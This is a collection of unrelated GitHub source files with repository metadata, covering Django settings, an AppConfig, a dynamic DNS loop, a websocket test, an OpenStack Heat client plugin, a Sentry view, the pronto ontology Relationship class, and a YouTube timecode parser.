'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
) | {
"content_hash": "e174964cc832e3994831075fa18854c6",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 91,
"avg_line_length": 26.096,
"alnum_prop": 0.6882280809319435,
"repo_name": "janusnic/dj-21v",
"id": "79a345301fcd01d4f8c8e9e060adb91bc867e75e",
"size": "3262",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "unit_02/mysite/mysite/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "607197"
},
{
"name": "HTML",
"bytes": "352620"
},
{
"name": "JavaScript",
"bytes": "4098502"
},
{
"name": "Python",
"bytes": "1906453"
}
],
"symlink_target": ""
} |
from django.apps import AppConfig
class PollConfig(AppConfig):
name = 'polls'
| {
"content_hash": "6f2c6f8e473f4827a58be6bdb18ec5ef",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 33,
"avg_line_length": 16.8,
"alnum_prop": 0.7380952380952381,
"repo_name": "achntrl/referendum",
"id": "23320d00c8d32a52c8142287656bb4a6fe49133b",
"size": "84",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "polls/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "869"
},
{
"name": "HTML",
"bytes": "24900"
},
{
"name": "JavaScript",
"bytes": "668"
},
{
"name": "Python",
"bytes": "21433"
}
],
"symlink_target": ""
} |
"""
This is the main loop of the system. Will check for a change
of ip address every 30 seconds and update if it has changed.
"""
from time import sleep
from config import *
from datetime import datetime
from log import Log
import sys, os
if __name__ == '__main__':
# Initialize log
log = Log()
log.write('Initializing...')
first = True
# Wait for system boot
sleep(60)
while(True):
try:
current_ip = SIMPLE_DYNDNS_SERVER.get_current_ip()
last_ip = SIMPLE_DYNDNS_SERVER.get_last_ip()
if not current_ip or not last_ip:
print "Error connecting to known server"
log.write("Error connecting to known server")
else:
print "Last IP: %s" % last_ip
print "Current IP: %s" % current_ip
if first:
log.write("Last IP: %s" % last_ip)
log.write("Current IP: %s" % current_ip)
first = False
if current_ip != last_ip:
# Set new IP address
print "Updating Records..."
log.write("Updating Records...")
for domain in DOMAINS:
domain.login()
domain.update_all(current_ip)
new_ip = SIMPLE_DYNDNS_SERVER.set_new_ip(current_ip)
print "New IP: %s" % new_ip
log.write("New IP: %s" % new_ip)
except KeyboardInterrupt:
# Debugging
print "Bye!"
sys.exit(0)
except:
# Catch any exception and get information in the log
exception = sys.exc_info()[0]
message = "Exception: %s" % (exception,)
log.write(message)
print message
sleep(SIMPLE_DYNDNS_SERVER.timer)
| {
"content_hash": "6a1a07a950ff3f81a6b448f1a876d5b8",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 76,
"avg_line_length": 26.205479452054796,
"alnum_prop": 0.4986931521170936,
"repo_name": "devalfrz/simple-dyndns",
"id": "89e0bcbd8db21f5847cbc11c1cf13d7259400bf1",
"size": "1932",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "loop.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "8146"
},
{
"name": "Shell",
"bytes": "1489"
}
],
"symlink_target": ""
} |
"""Tests for stream module."""
from __future__ import absolute_import
import unittest
import set_sys_path # Update sys.path to locate mod_pywebsocket module.
from mod_pywebsocket import common
from mod_pywebsocket import stream
class StreamTest(unittest.TestCase):
"""A unittest for stream module."""
def test_create_header(self):
# more, rsv1, ..., rsv4 are all true
header = stream.create_header(common.OPCODE_TEXT, 1, 1, 1, 1, 1, 1)
self.assertEqual(b'\xf1\x81', header)
# Maximum payload size
header = stream.create_header(common.OPCODE_TEXT, (1 << 63) - 1, 0, 0,
0, 0, 0)
self.assertEqual(b'\x01\x7f\x7f\xff\xff\xff\xff\xff\xff\xff', header)
# Invalid opcode 0x10
self.assertRaises(ValueError, stream.create_header, 0x10, 0, 0, 0, 0,
0, 0)
# Invalid value 0xf passed to more parameter
self.assertRaises(ValueError, stream.create_header, common.OPCODE_TEXT,
0, 0xf, 0, 0, 0, 0)
# Too long payload_length
self.assertRaises(ValueError, stream.create_header, common.OPCODE_TEXT,
1 << 63, 0, 0, 0, 0, 0)
if __name__ == '__main__':
unittest.main()
# vi:sts=4 sw=4 et
| {
"content_hash": "9c71ff68f7e9916ce1415608dfd4ada9",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 79,
"avg_line_length": 32.575,
"alnum_prop": 0.5909439754412893,
"repo_name": "GoogleChromeLabs/pywebsocket3",
"id": "153899d20533eb4cf0a9816c8b3b2bc8c50548bf",
"size": "2855",
"binary": false,
"copies": "21",
"ref": "refs/heads/master",
"path": "test/test_stream.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "19422"
},
{
"name": "JavaScript",
"bytes": "24155"
},
{
"name": "Python",
"bytes": "419498"
},
{
"name": "SWIG",
"bytes": "3312"
}
],
"symlink_target": ""
} |
from oslo_log import log as logging
from heat.common.i18n import _LE
LOG = logging.getLogger(__name__)
from zaqarclient.queues.v1 import client as zaqarclient
from zaqarclient.transport import errors as zaqar_errors
from heat.engine.clients import client_plugin
CLIENT_NAME = 'zaqar'
class ZaqarClientPlugin(client_plugin.ClientPlugin):
exceptions_module = zaqar_errors
service_types = [MESSAGING] = ['messaging']
DEFAULT_TTL = 3600
def _create(self):
return self.create_for_tenant(self.context.tenant_id)
def create_for_tenant(self, tenant_id):
con = self.context
if self.auth_token is None:
LOG.error(_LE("Zaqar connection failed, no auth_token!"))
return None
opts = {
'os_auth_token': self.auth_token,
'os_auth_url': con.auth_url,
'os_project_id': tenant_id,
'os_service_type': self.MESSAGING,
}
auth_opts = {'backend': 'keystone',
'options': opts}
conf = {'auth_opts': auth_opts}
endpoint = self.url_for(service_type=self.MESSAGING)
client = zaqarclient.Client(url=endpoint, conf=conf, version=1.1)
return client
def is_not_found(self, ex):
return isinstance(ex, zaqar_errors.ResourceNotFound)
| {
"content_hash": "8bd5b18b0b1a289d16ed09d1a01ee555",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 73,
"avg_line_length": 27.5,
"alnum_prop": 0.6325757575757576,
"repo_name": "gonzolino/heat",
"id": "2b5d99f1ee841d3fad56fc27ff15da0de365bfeb",
"size": "1895",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "heat/engine/clients/os/zaqar.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "7214144"
},
{
"name": "Shell",
"bytes": "32170"
}
],
"symlink_target": ""
} |
import datetime
import operator
import typing
from typing import Dict, Iterable, FrozenSet, Optional, Set, Tuple, Iterator
from .definition import Definition
from .entity import Entity, EntityData, EntitySet
from .logic import SubpropertiesIterator, SuperpropertiesIterator
from .logic.lineage import SubpropertiesHandler, SuperpropertiesHandler
from .pv import PropertyValue
from .synonym import SynonymData
from .utils.meta import typechecked
from .xref import Xref
if typing.TYPE_CHECKING:
from .ontology import Ontology
from .term import Term
__all__ = ["Relationship", "RelationshipData", "RelationshipSet"]
class RelationshipData(EntityData):
"""Internal data storage of `Relationship` information."""
id: str
anonymous: bool
name: Optional[str]
namespace: Optional[str]
alternate_ids: Set[str]
definition: Optional[Definition]
comment: Optional[str]
subsets: Set[str]
synonyms: Set[SynonymData]
xrefs: Set[Xref]
annotations: Set[PropertyValue]
domain: Optional[str]
range: Optional[str]
builtin: bool
holds_over_chain: Set[Tuple[str, str]]
antisymmetric: bool
cyclic: bool
reflexive: bool
asymmetric: bool
symmetric: bool
transitive: bool
functional: bool
inverse_functional: bool
intersection_of: Set[str]
inverse_of: Optional[str]
transitive_over: Set[str]
equivalent_to_chain: Set[Tuple[str, str]]
disjoint_over: Set[str]
obsolete: bool
created_by: Optional[str]
creation_date: Optional[datetime.datetime]
expand_assertion_to: Set[Definition]
expand_expression_to: Set[Definition]
metadata_tag: bool
class_level: bool
if typing.TYPE_CHECKING:
__annotations__: Dict[str, str]
__slots__ = tuple(__annotations__) # noqa: E0602
def __init__(
self,
id: str,
anonymous: bool = False,
name: Optional[str] = None,
namespace: Optional[str] = None,
alternate_ids: Optional[Set[str]] = None,
definition: Optional[Definition] = None,
comment: Optional[str] = None,
subsets: Optional[Set[str]] = None,
synonyms: Optional[Set[SynonymData]] = None,
xrefs: Optional[Set[Xref]] = None,
annotations: Optional[Set[PropertyValue]] = None,
domain: Optional[str] = None,
range: Optional[str] = None,
builtin: bool = False,
holds_over_chain: Optional[Set[Tuple[str, str]]] = None,
antisymmetric: bool = False,
cyclic: bool = False,
reflexive: bool = False,
asymmetric: bool = False,
symmetric: bool = False,
transitive: bool = False,
functional: bool = False,
inverse_functional: bool = False,
intersection_of: Optional[Set[str]] = None,
union_of: Optional[Set[str]] = None,
equivalent_to: Optional[Set[str]] = None,
disjoint_from: Optional[Set[str]] = None,
inverse_of: Optional[str] = None,
transitive_over: Optional[Set[str]] = None,
equivalent_to_chain: Optional[Set[Tuple[str, str]]] = None,
disjoint_over: Optional[Set[str]] = None,
relationships: Optional[Dict[str, Set[str]]] = None,
obsolete: bool = False,
created_by: Optional[str] = None,
creation_date: Optional[datetime.datetime] = None,
replaced_by: Optional[Set[str]] = None,
consider: Optional[Set[str]] = None,
expand_assertion_to: Optional[Set[Definition]] = None,
expand_expression_to: Optional[Set[Definition]] = None,
metadata_tag: bool = False,
class_level: bool = False,
):
self.id = id
self.anonymous = anonymous
self.name = name
self.namespace = namespace
self.alternate_ids = alternate_ids or set()
self.definition = definition
self.comment = comment
self.subsets = subsets or set()
self.synonyms = synonyms or set()
self.xrefs = xrefs or set()
self.annotations = annotations or set()
self.domain = domain
self.range = range
self.builtin = builtin
self.holds_over_chain = holds_over_chain or set()
self.antisymmetric = antisymmetric
self.cyclic = cyclic
self.reflexive = reflexive
self.asymmetric = asymmetric
self.symmetric = symmetric
self.transitive = transitive
self.functional = functional
self.inverse_functional = inverse_functional
self.intersection_of = intersection_of or set()
self.union_of = union_of or set()
self.equivalent_to = equivalent_to or set()
self.disjoint_from = disjoint_from or set()
self.inverse_of = inverse_of
self.transitive_over = transitive_over or set()
self.equivalent_to_chain = equivalent_to_chain or set()
self.disjoint_over = disjoint_over or set()
self.relationships = relationships or dict()
self.obsolete = obsolete
self.created_by = created_by
self.creation_date = creation_date
self.replaced_by = replaced_by or set()
self.consider = consider or set()
self.expand_assertion_to = expand_assertion_to or set()
self.expand_expression_to = expand_expression_to or set()
self.metadata_tag = metadata_tag
self.class_level = class_level
class RelationshipSet(EntitySet["Relationship"]):
"""A specialized mutable set to store `Relationship` instances."""
# --- Magic methods ------------------------------------------------------
def __iter__(self) -> Iterator["Relationship"]:
return map(lambda t: self._ontology.get_relationship(t), iter(self._ids)) # type: ignore
# --- Methods ---------------------------------------------------------
def subproperties(
self, distance: Optional[int] = None, with_self: bool = True
) -> SubpropertiesIterator:
"""Get an iterator over the subproperties of all relationships in the set."""
return SubpropertiesIterator(*self, distance=distance, with_self=with_self)
def superproperties(
self, distance: Optional[int] = None, with_self: bool = True
) -> SuperpropertiesIterator:
"""Get an iterator over the superproperties of all relationships in the set.
Example:
>>> pato = pronto.Ontology("pato.obo")
>>> proportionality_to = pato["PATO:0001470"]
>>> quality_mapping = pronto.RelationshipSet(
... r for r in pato.relationships()
... if r.domain == proportionality_to
... )
>>> sorted(quality_mapping.subproperties().to_set().ids)
['has_dividend_entity', 'has_dividend_quality', ...
"""
return SuperpropertiesIterator(*self, distance=distance, with_self=with_self)
class Relationship(Entity["RelationshipData", "RelationshipSet"]):
"""A relationship, constitute the edges of the ontology graph.
Also sometimes refered as typedefs, relationship types, properties or
predicates. Formally equivalent to a property (either ``ObjectProperty``
or ``AnnotationProperty``) in OWL2.
"""
if typing.TYPE_CHECKING:
def __init__(self, ontology: "Ontology", reldata: "RelationshipData"):
super().__init__(ontology, reldata)
def _data(self) -> "RelationshipData":
return typing.cast("RelationshipData", super()._data())
# --- Associated type variables ------------------------------------------
_Set = RelationshipSet
_data_getter = operator.attrgetter("_relationships")
# --- Methods ------------------------------------------------------------
def subproperties(
self, distance: Optional[int] = None, with_self: bool = True
) -> "SubpropertiesHandler":
"""Get an handle over the subproperties of this `Relationship`.
Arguments:
distance (int, optional): The maximum distance between this
relationship and the yielded subproperties (`0` for the
relationship itself, `1` for its immediate children, etc.).
Use `None` to explore the entire directed graph transitively.
with_self (bool): Whether or not to include the current term in
the terms being yielded. RDF semantics state that the
``rdfs:subClassOf`` property is reflexive (and therefore is
``rdfs:subPropertyOf`` reflexive too by transitivity), so this
is enabled by default, but in most practical cases only the
distinct subproperties are desired.
"""
return SubpropertiesHandler(self, distance=distance, with_self=with_self)
def superproperties(
self, distance: Optional[int] = None, with_self: bool = True
) -> "SuperpropertiesHandler":
"""Get an handle over the superproperties of this `Relationship`.
In order to follow the semantics of ``rdf:subPropertyOf``, which in
turn respects the mathematical definition of subset inclusion, ``is_a``
is defined as a transitive relationship, hence the inverse relationship
is also transitive by closure property.
Arguments:
distance (int, optional): The maximum distance between this
relationship and the yielded subperoperties (`0` for the
relationship itself, `1` for its immediate parents, etc.).
Use `None` to explore the entire directed graph transitively.
with_self (bool): Whether or not to include the current term in
the terms being yielded. RDF semantics state that the
``rdfs:subClassOf`` property is transitive (and therefore is
``rdfs:subPropertyOf`` transitive too), so this is enabled
by default, but in most practical cases only the distinct
subproperties are desired.
"""
return SuperpropertiesHandler(self, distance=distance, with_self=with_self)
# --- Attributes ---------------------------------------------------------
@property
def antisymmetric(self) -> bool:
"""`bool`: Whether this relationship is anti-symmetric."""
return self._data().antisymmetric
@antisymmetric.setter # type: ignore
@typechecked(property=True)
def antisymmetric(self, value: bool) -> None:
self._data().antisymmetric = value
@property
def asymmetric(self) -> bool:
"""`bool`: Whether this relationship is asymmetric."""
return self._data().asymmetric
@asymmetric.setter # type: ignore
@typechecked(property=True)
def asymmetric(self, value: bool) -> None:
self._data().asymmetric = value
@property
def class_level(self) -> bool:
"""`bool`: Whether this relationship is applied at class level.
This tag affects how OBO ``relationship`` tags should be translated
in OWL2: by default, all relationship tags are taken to mean an
all-some relation over an instance level relation. With this flag
set to `True`, the relationship will be translated to an `owl:hasValue`
restriction.
"""
return self._data().class_level
@class_level.setter # type: ignore
@typechecked(property=True)
def class_level(self, value: bool) -> None:
self._data().class_level = value
@property
def cyclic(self) -> bool:
"""`bool`: Whether this relationship is cyclic."""
return self._data().cyclic
@cyclic.setter # type: ignore
@typechecked(property=True)
def cyclic(self, value: bool) -> None:
self._data().cyclic = value
@property
def disjoint_over(self) -> "RelationshipSet":
"""`frozenset`: The relationships this relationships is disjoint over."""
s = RelationshipSet()
s._ids = self._data().disjoint_over
s._ontology = self._ontology()
return s
@property
def domain(self) -> Optional["Term"]:
"""`Term` or `None`: The domain of the relationship, if any."""
data, ontology = self._data(), self._ontology()
if data.domain is not None:
return ontology.get_term(data.domain)
return None
@domain.setter
def domain(self, value: Optional["Term"]) -> None:
rshipdata, ontology = self._data(), self._ontology()
if value is not None:
try:
ontology.get_term(value.id)
except KeyError:
raise ValueError(f"{value} is not a term in {ontology}")
rshipdata.domain = value.id if value is not None else None
@property
def equivalent_to_chain(self) -> FrozenSet[Tuple["Relationship", "Relationship"]]:
return frozenset(
{
tuple(map(self._ontology().get_relationship, chain))
for chain in self._data().equivalent_to_chain
}
)
@equivalent_to_chain.setter
def equivalent_to_chain(self, equivalent_to_chain: Iterable[Tuple["Relationship", "Relationship"]]):
data = self._data()
data.equivalent_to_chain = {
(r1.id, r2.id)
for r1, r2 in equivalent_to_chain
}
@property
def expand_assertion_to(self) -> FrozenSet[Definition]:
return frozenset(self._data().expand_assertion_to)
@property
def expand_expression_to(self) -> FrozenSet[Definition]:
return frozenset(self._data().expand_expression_to)
@property
def functional(self) -> bool:
"""`bool`: Whether this relationship is functional."""
return self._data().functional
@functional.setter # type: ignore
@typechecked(property=True)
def functional(self, value: bool) -> None:
self._data().functional = value
@property
def inverse_functional(self) -> bool:
"""`bool`: Whether this relationship is inverse functional."""
return self._data().inverse_functional
@inverse_functional.setter # type: ignore
@typechecked(property=True)
def inverse_functional(self, value: bool) -> None:
self._data().inverse_functional = value
@property
def metadata_tag(self) -> bool:
"""`bool`: Whether or not this relationship is a metadata tag.
This tag affects how OBO typedefs should be translated in OWL2: by
default, all typedef tags are translated to an `owl:ObjectProperty`.
With this flag set to `True`, the typedef will be translated to an
`owl:AnnotationProperty`.
"""
return self._data().metadata_tag
@metadata_tag.setter # type: ignore
@typechecked(property=True)
def metadata_tag(self, value: bool):
self._data().metadata_tag = value
@property
def holds_over_chain(self) -> FrozenSet[Tuple["Relationship", "Relationship"]]:
"""`frozenset` of `Relationship` couples: The chains this relationship holds over."""
ont: "Ontology" = self._ontology()
data: "RelationshipData" = self._data()
return frozenset(
tuple(map(ont.get_term, chain))
for chain in data.holds_over_chain
)
@holds_over_chain.setter
def holds_over_chain(self, holds_over_chain: Iterable[Tuple["Relationship", "Relationship"]]) -> None:
data: "RelationshipData" = self._data()
data.holds_over_chain = {
(r1.id, r2.id)
for r1, r2 in holds_over_chain
}
@property
def inverse_of(self) -> Optional["Relationship"]:
"""`Relationship` or `None`: The inverse of this relationship, if any."""
ont, reldata = self._ontology(), self._data()
if reldata.inverse_of is not None:
return ont.get_relationship(reldata.inverse_of)
return None
@inverse_of.setter
def inverse_of(self, value: Optional["Relationship"]):
self._data().inverse_of = None if value is None else value.id
@property
def intersection_of(self) -> "RelationshipSet":
"""`RelationshipSet`: The relations this relationship is an intersection of."""
s = RelationshipSet()
s._ids = self._data().intersection_of
s._ontology = self._ontology()
return s
@property
def range(self) -> Optional["Term"]:
"""`Term` or `None`: The range of the relationship, if any."""
range, ont = self._data().range, self._ontology()
return ont.get_term(range) if range is not None else None
@range.setter
def range(self, value: Optional["Term"]):
if value is not None:
try:
self._ontology().get_term(value.id)
except KeyError:
raise ValueError(f"{value} is not in {self._ontology()}")
self._data().range = value.id if value is not None else None
@property
def reflexive(self) -> bool:
"""`bool`: Whether or not the relationship is reflexive."""
return self._data().reflexive
@reflexive.setter # type: ignore
@typechecked(property=True)
def reflexive(self, value: bool):
self._data().reflexive = value
@property
def symmetric(self) -> bool:
"""`bool`: Whether or not the relationship is symmetric."""
return self._data().symmetric
@symmetric.setter # type: ignore
@typechecked(property=True)
def symmetric(self, value: bool):
self._data().symmetric = value
@property
def transitive(self) -> bool:
"""`bool`: Whether or not the relationship is transitive."""
return self._data().transitive
@transitive.setter # type: ignore
@typechecked(property=True)
def transitive(self, value: bool):
self._data().transitive = value
@property
def transitive_over(self) -> "RelationshipSet":
"""`RelationshipSet`: The relations this relationship is transitive over."""
s = RelationshipSet()
s._ids = self._data().transitive_over
s._ontology = self._ontology()
return s
# TODO: remove in v3.0.0
_BUILTINS = {
"is_a": RelationshipData(
id="is_a",
anonymous=False,
name="is a",
namespace=None,
alternate_ids=None,
definition=Definition(
"A subclassing relationship between one term and another",
xrefs=set(
{
Xref(
"http://owlcollab.github.io/oboformat/doc/GO.format.obo-1_4.html"
)
}
),
),
comment=None,
subsets=None,
synonyms=None,
xrefs=None,
annotations=None,
domain=None,
range=None,
builtin=True,
holds_over_chain=None,
antisymmetric=True,
cyclic=True,
reflexive=True,
asymmetric=False,
symmetric=False,
transitive=True,
functional=False,
inverse_functional=False,
intersection_of=None,
union_of=None,
equivalent_to=None,
disjoint_from=None,
inverse_of=None,
transitive_over=None,
equivalent_to_chain=None,
disjoint_over=None,
relationships=None,
obsolete=False,
created_by=None,
creation_date=None,
replaced_by=None,
consider=None,
expand_assertion_to=None, # TODO
expand_expression_to=None, # TODO
metadata_tag=False,
class_level=True,
)
}
| {
"content_hash": "ec1f4227e84218413983ae8b107ce9a9",
"timestamp": "",
"source": "github",
"line_count": 539,
"max_line_length": 106,
"avg_line_length": 36.257884972170686,
"alnum_prop": 0.6103975848129766,
"repo_name": "althonos/pronto",
"id": "1c9e3e84d1c9775c6943d383c498d793e54c50c3",
"size": "19543",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pronto/relationship.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "291657"
}
],
"symlink_target": ""
} |
from lib.Request import Request
from lib.Response import Response
import json
class RequestValidator(Request):
"""
This class will manage all the operation of a validation
this is responsible for getting the response and sendting it for validation
This will coordinate between request and response
"""
_configuration = None
"""
dict: Collection of all basic configuration
"""
_logger = None
"""
object: Instance of logger
"""
def __init__(self, configuration, logging):
"""
Initializes the validation process for the current rule
This will validate the rule for the minimum required data and its format
Initializes the logger on the rule name to make it easy to debug
Args:
configuration (dict): basic application configuration
logging (object): logger instance
"""
print('Validating '+ self.__class__.__name__)
self._configuration = configuration
self._logger = logging.getLogger(self.__class__.__name__)
self.validate_rule(self.REQUIRED_ATTRIBUTES, self.rules)
super().__init__(
self._configuration,
self._logger,
self.rules['request']
)
def run(self):
"""
Runs the validation on current rule
"""
response = self.create_request().getresponse()
Response(
self._configuration,
self._logger,
self.rules['response']
).validate_response(
json.loads(
response.read().decode(
self._configuration['encoding']
)
)
)
print('complete')
| {
"content_hash": "37906cf1c58e86a8e702058e9df30976",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 80,
"avg_line_length": 29.15,
"alnum_prop": 0.5757575757575758,
"repo_name": "ratanphayade/APIValidator",
"id": "b9eb8f6339d2b3ec343070e1046da3e4aa59fc33",
"size": "1749",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/RequestValidator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "28962"
}
],
"symlink_target": ""
} |
import collections
import json
def format_exception(e):
"""
Parameters
----------
e : exceptions.Exception
Returns
-------
str
"""
data = collections.OrderedDict()
data['exception_type'] = type(e).__module__ + '.' + e.__class__.__name__
data['exception_message'] = e.message
return json.dumps(data)
| {
"content_hash": "4c5d935ea2f0b7ef99fb037b84077d9c",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 76,
"avg_line_length": 16.80952380952381,
"alnum_prop": 0.5580736543909348,
"repo_name": "dnguyen0304/clare",
"id": "4b13bdf61ca4ef399b930e97ab20aefe0418485c",
"size": "378",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "clare/clare/common/logging/utilities.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "185515"
},
{
"name": "Shell",
"bytes": "696"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/furniture/shared_furniture_toolchest_large.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "d5922582284df51dfb828ba29ca0ccd5",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 90,
"avg_line_length": 24.53846153846154,
"alnum_prop": 0.7053291536050157,
"repo_name": "anhstudios/swganh",
"id": "5fe43f3e0c47160346935e7b8ba2772adf4108ef",
"size": "464",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "data/scripts/templates/object/draft_schematic/furniture/shared_furniture_toolchest_large.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11887"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2357839"
},
{
"name": "CMake",
"bytes": "41264"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7503510"
},
{
"name": "SQLPL",
"bytes": "42770"
}
],
"symlink_target": ""
} |
default_app_config = "fluentcms_suit.apps.DefaultConfig"
| {
"content_hash": "dfa604f44f71305ceec0b1089e3fc066",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 56,
"avg_line_length": 57,
"alnum_prop": 0.8070175438596491,
"repo_name": "bashu/fluentcms-suit",
"id": "5a21e4c681bc74a2ff0dcab179e70f14baaaedb7",
"size": "57",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "fluentcms_suit/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "10583"
},
{
"name": "HTML",
"bytes": "44324"
},
{
"name": "Python",
"bytes": "12683"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.utils.translation import ugettext_lazy as _
from sentry.models import Rule
from sentry.web.frontend.base import ProjectView
class ProjectRuleRemoveView(ProjectView):
required_scope = 'project:write'
def post(self, request, organization, team, project, rule_id):
path = reverse('sentry-project-rules', args=[organization.slug, project.slug])
try:
rule = Rule.objects.get(project=project, id=rule_id)
except Rule.DoesNotExist:
return self.redirect(path)
rule.delete()
messages.add_message(request, messages.SUCCESS,
_('The rule was removed.'))
return self.redirect(path)
| {
"content_hash": "a58582cf02f88f2f235ad36dcc2e8c9b",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 86,
"avg_line_length": 29.703703703703702,
"alnum_prop": 0.6970074812967582,
"repo_name": "nicholasserra/sentry",
"id": "a01d84ad6e783c3a54d554d96edc38d03343b75c",
"size": "802",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "src/sentry/web/frontend/project_rule_remove.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "174940"
},
{
"name": "HTML",
"bytes": "199996"
},
{
"name": "JavaScript",
"bytes": "609445"
},
{
"name": "Lua",
"bytes": "21966"
},
{
"name": "Makefile",
"bytes": "4816"
},
{
"name": "Python",
"bytes": "8613631"
}
],
"symlink_target": ""
} |
import json
import re
class IdleVideo(object):
def __init__(self, title, episode, description, videoId, date, duration, timecodes):
self.title = title
self.episode = episode
self.description = description
self.videoId = videoId
self.date = date
self.duration = duration
self.timecodes = timecodes
class IdleTimecodeType(object):
standard = "segment"
readerMail = "readerMail"
robotNews = "robotNews"
intro = "intro"
outro = "outro"
class IdleTimecode(object):
def __init__(self, type, duration, startTime, title):
self.type = type
self.duration = duration
self.startTime = startTime
self.title = title
def __str__(self):
return str(self.duration) + " || " + self.title
def __repr__(self):
return self.__str__()
def process_video_data(item):
if re.match("Idle Thumbs \d+", item['snippet']['title']) is None:
# print "Not a valid episode title:\n " + item['snippet']['title']
return None
titleParts = item['snippet']['title'].split(" - ")
if len(titleParts) < 2:
print "Something wrong with parsing this title\n " + item['snippet']['title']
return None
title = " - ".join(titleParts[1:])
episode = titleParts[0][12:]
timecode_lines = re.search(r"\d\d:\d\d.*", item['snippet']['description'], flags=re.DOTALL).group(0).split("\n")
print timecode_lines
lines = item['snippet']['description'].split("\n")
description = ""
for line in lines:
if (len(line.split(u" \u2014 ")) > 1):
break
description = description + line + "\n"
timecodes = []
for line in lines:
try:
if (len(line.split(u" \u2014 ")) > 1):
timestamp = line.split(u" \u2014 ")[0] # format of hh:mm:ss
timestamp = timestamp.replace(";", ":")
timestampParts = timestamp.split(":")
if len(timestampParts) == 2:
startTime = int(timestampParts[0])*60 + int(timestampParts[1])
elif len(timestampParts) == 3:
startTime = int(timestampParts[0])*3600 + int(timestampParts[1])*60 + int(timestampParts[2])
else:
print "Something is wrong with this timecode line\n " + line
continue
topic = line.split(u" \u2014 ")[1].split(" - ")[0]
type = IdleTimecodeType.standard
if topic == "Reader Mail":
type = IdleTimecodeType.readerMail
if topic == "Outro":
type = IdleTimecodeType.outro
if topic == "Intro":
type = IdleTimecodeType.intro
if topic == "Robot News":
type == IdleTimecodeType.robotNews
title = " - ".join(line.split(u" \u2014 ")[1].split(" - ")[1:])
if(len(timecodes) > 1):
previousTimecode = timecodes[len(timecodes)-1]
else:
previousTimecode = None
if previousTimecode is not None:
previousTimecode.duration = startTime - previousTimecode.startTime
tcDuration = 0
timecodes.append(IdleTimecode(type=type, startTime=startTime, title=title, duration=tcDuration))
except Exception as e:
print e
print ">>ooops in "+item['snippet']['title']+"\n "+line
if len(timecodes) == 0:
return None
timecodes[len(timecodes)-1].duration = duration - timecodes[len(timecodes)-1].startTime
for timecode in timecodes:
print timecode
videoId = item['snippet']['resourceId']['videoId']
return IdleVideo(title=title, episode=episode, description=description, videoId=videoId, date=0, duration=duration, timecodes=timecodes)
if __name__ == "__main__":
with open('data.json', 'r') as f:
data = json.load(f)
for item in data:
if process_video_data(item) is not None:
break
# videos = [process_video_data(item) for item in data]
# len(videos)
| {
"content_hash": "eadde47eacab4dd31e014e398558aacc",
"timestamp": "",
"source": "github",
"line_count": 138,
"max_line_length": 138,
"avg_line_length": 27.36231884057971,
"alnum_prop": 0.6173199152542372,
"repo_name": "karthikb351/thumbsdb",
"id": "c5dfc41158cfaf45e3526d2219a4dbf188da86b9",
"size": "3777",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/process.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1345"
},
{
"name": "HTML",
"bytes": "7896"
},
{
"name": "JavaScript",
"bytes": "11762"
},
{
"name": "Jupyter Notebook",
"bytes": "8274"
},
{
"name": "Python",
"bytes": "5400"
}
